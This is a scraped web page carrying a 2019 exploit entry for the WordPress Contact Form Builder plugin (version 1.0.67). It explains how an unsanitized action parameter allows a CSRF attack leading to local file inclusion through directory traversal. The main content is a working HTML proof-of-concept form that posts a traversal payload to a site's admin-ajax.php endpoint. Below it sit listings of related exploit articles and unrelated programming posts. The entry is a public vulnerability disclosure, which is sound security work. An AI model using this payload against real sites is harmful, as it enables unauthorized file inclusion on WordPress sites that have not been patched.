# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

PoC
------

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
    <label>AJAX action:
        <select name="action">
                <option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
                <option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
                <option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
                <option value="CFMShortcode">CFMShortcode</option>
        </select>
    </label>
    <button type="submit" value="Submit">Submit</button>
</form>
```

WordPress Plugin Contact Form Builder [CSRF → LFI]的更多相关文章

  1. WordPress plugin Contact Form [CSRF → LFI] vulnerable 2019-03-17

    # Exploit Title: Contact Form by WD [CSRF → LFI]# Date: 2019-03-17# Exploit Author: Panagiotis Vagen ...

  2. WordPress Plugin Form Maker [CSRF → LFI] vulnerable 2019-03-17

    # Title: Form Maker by WD [CSRF → LFI]# Date: 2019-03-17# Exploit Author: Panagiotis Vagenas# Vendor ...

  3. WordPress Contact Form 7插件任意文件上传漏洞

    漏洞名称: WordPress Contact Form 7插件任意文件上传漏洞 CNNVD编号: CNNVD-201311-415 发布时间: 2013-11-28 更新时间: 2013-11-28 ...

  4. Contact Form 7邮件发送失败的解决办法

    一.contact form 7无法发送邮件的原因 对mail()函数的不支持. Contact Form 7表单提交失败在使用过程中会出现,归根结底原因在于wordpress主机问题,由于国 内很多 ...

  5. article2pdf (Wordpress plug-in) Multiple vulnerabilities(CVE-2019-1000031, CVE-2019-1010257)

    Product: article2pdf (Wordpress plug-in)Product Website: https://wordpress.org/plugins/article2pdf/A ...

  6. Django之Form、CSRF、cookie和session

    Django是一个大而全的web框架,为我们提供了很多实用的功能,本文主要介绍Form.CSRF.cookie和session 一.Form 在web页面中form表单是重要的组成部分,为了数据安全和 ...

  7. [转]jQuery Popup Login and Contact Form

    本文转自:http://www.formget.com/jquery-popup-form/ Pop up forms are the smart way to present your site. ...

  8. Django的Form、CSRF、cookie和session

    Django是一个大而全的web框架,为我们提供了很多实用的功能,本文主要介绍Form.CSRF.cookie和session 一.Form 在web页面中form表单是重要的组成部分,为了数据安全和 ...

  9. WP Mail SMTP插件解决Contact Form 7表单提交失败问题

    WP Mail SMTP插件解决Contact Form 7表单提交失败问题 WP Mail SMTP是一款非常优秀的解决WordPress主机因为不支持或者是禁用了mail()函数,导致无法实现在线 ...

随机推荐

  1. centos7安装、配置、卸载jdk1.8

    环境: centos7 64bit jdk-8u121-linux-x64 一.安装jdk 1.安装jdk rpm -ivh jdk-8u121-linux-x64.rpm 2.查看是否安装成功 ja ...

  2. IOS以无线方式安装企业内部应用(开发者)

    请先阅读:http://help.apple.com/deployment/ios/#/apda0e3426d7 操作系统:osx yosemite 10.10.5 (14F1509) xcode:V ...

  3. python学习——读取染色体长度(五:从命令行输入染色体长度)

    # 传递命令行参数 # 导入sys模块 import sys print(sys.argv)   命令行操作 python argv.py 10 20 30 40 50 回车输出 ['argv.py' ...

  4. R语言学习——图形初阶之折线图与图形参数控制

    plot()是R中为对象作图的一个泛型函数(它的输出将根据所绘制对象类型的不同而变化):plot(x,y,type="b")表示将x置于横轴,y置于纵轴,绘制点集(x,y),然后使 ...

  5. pytorch中文文档-torch.nn常用函数-待添加-明天继续

    https://pytorch.org/docs/stable/nn.html 1)卷积层 class torch.nn.Conv2d(in_channels, out_channels, kerne ...

  6. 类SimpleDateFormat

    概述 java.text.DateFormat 是日期/时间格式化子类的抽象类,不能直接使用.我们通过这个类的子类可以帮我们完成日期和文本之间的转换,也就是可以在Date对象与String对象之间进行 ...

  7. 如何把Office365的更新从半年通道改成月度通道

    转自msdn,转发链接:www.cnblogs.com/Charltsing/p/Office365month.html 作者QQ: 564955427 建立一个Bat文件,写入 下面内容 setlo ...

  8. (七)jdk8学习心得之join方法

    七.join方法 1. 作用:将list或者数组按照连接符进行连接,返回一个字符串. 2. 使用方法 1) String.join(“连接符”,数组对象或者list对象) 2) 首先转换成stream ...

  9. Java数据库学习之SQL语句动态拼接

    public class UserDaoImpl implements UserDao { @Override public List<User> getUserByPage(PageIn ...

  10. js作用域零碎的知识点,不同的script块,虽然同是全局变量

    如下代码,第一次弹出a,因为解析器里找到var a,赋予a变量undefined,弹出undefined <!DOCTYPE html> <html> <head> ...